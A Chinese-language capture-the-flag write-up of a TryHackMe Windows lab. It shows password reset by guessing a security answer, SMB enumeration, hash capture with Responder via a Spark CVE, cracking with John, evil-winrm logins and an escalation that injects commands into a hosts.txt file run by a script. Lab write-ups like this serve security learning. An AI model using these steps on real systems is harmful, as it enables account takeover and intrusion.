端口扫描

开了好多端口诶

cat nmap |grep open |awk -F'/' '{print $1}' | tr '\n\r' ','

可以用这个命令快速分割出端口号

Web

先从80端口下手,访问发现是一个公司的网站,发现右上角有一个重置密码,但是登录不了,也许要添加DNS解析

在/etc/hosts文件里面添加

在重置的页面需要回答问题,还有用户名,我们在主页可以看到底下有三个用户,大概是员工。其中一个问题是最喜爱的宠物的名字,第二个用户抱着只狗,尝试下载图片。发现图片的名字是lilyleAndSparky,可能是她和她宠物的名字。发现重置成功。

重置后的密码是ChangeMe#1234,但是暂时还不知道哪里能登陆

SMB

看到有SMB服务(149,445端口),枚举一下

enum4linux -a 10.10.88.248

没发现东西,用一下smbmap

smbmap -u lilyle -p ChangeMe#1234 -R -H windcorp.thm

找到一个名叫Shared共享,连接

smbclient -U lilyle //10.10.88.248/Shared

找到flag1:THM{466d52dc75a277d6c3f6c6fcbc716d6b62420f48}

浪费时间安装APP

在下载下面的文件时遇到了超时的问题,看了下WP,可以用-t增加超时时间

smbclient -t 500 -U lilyle //10.10.88.248/Shared

下面几个应该下一个就行,因为在kali中就下载.deb

sudo dpkg -i spark_2_8_3.deb

提示缺少jdk8,而且kali现在好像不支持直接安装了要手动

https://www.oracle.com/java/technologies/downloads/

我是下载在/usr/lib/jvm目录

sudo tar -xvzf jdk-8u381-linux-x64.tar.gz

然后添加环境变量

vim ~/.zshrc

在末尾添加

export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_381
export PATH=$JAVA_HOME/bin:$PATH

保存退出

source ~/.zshrc

运行

安装

dpkg-deb -X ~/桌面/spark_2_8_3.deb /spark
~/桌面/spark/usr/bin/spark

Exploit

打开发现是一个app

搜索这个软件,发现存在CVE,版本也符合

https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

这个页面告诉了利用方式,可以泄露用户的哈希值,6

用lilyle的账户登录,域名就填windcorp.thm

结果提示证书有误

在“高级”中勾选下面两个,成功登录

在底下联系人搜索这个在线用户

sudo responder -I tun0

开启一个responder

然后随便发一个

文件不存在也无所谓,然后就捕获到这个用户的hash了

用John来爆破

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

得到了buse的密码uzunLM+3131

因为开启了5985端口,所以我们可以用evil-winrm来远程连接

evil-winrm -i windcorp.thm -u buse -p uzunLM+3131

在用户的桌面上找到flag2

THM{6f690fc72b9ae8dc25a24a104ed804ad06c7c9b1}

提权

在c:\目录发现一个script文件,里面有一个脚本

因为对powershell不太熟悉,交给GPT来分析一下

貌似是读取brittanycr用户的hosts.txt然后执行每一条

whoami /groups

发现自己是Account Operators组,能更改bri用户的密码

net user brittanycr '1q2w3e4r!'

但是发现不能用evil或是psexec等工具远程连接这个用户,用SMB

找到一个Users共享

smbclient //10.10.176.118/Users -U brittanycr
cd brittanycr

可以通过get,rm,put的方式来更改hosts.txt文件

将这个一个新用户添加到管理员组。等待一会儿后,用evil-winrm连接

evil-winrm -i windcorp.thm -u yuanshen -p '1q2w3e4r5t!'

flag3.

THM{ba3a2bff2e535b514ad760c283890faae54ac2ef}

碎碎念

hard难度的靶机果然名不虚传,全程打下来都不顺畅,对于SMB的理解又加深了,然后安装他那个spark玩意真浪费了好多时间(恼。提权的过程其实还行,总之比较考验windows基础,还要多加学习。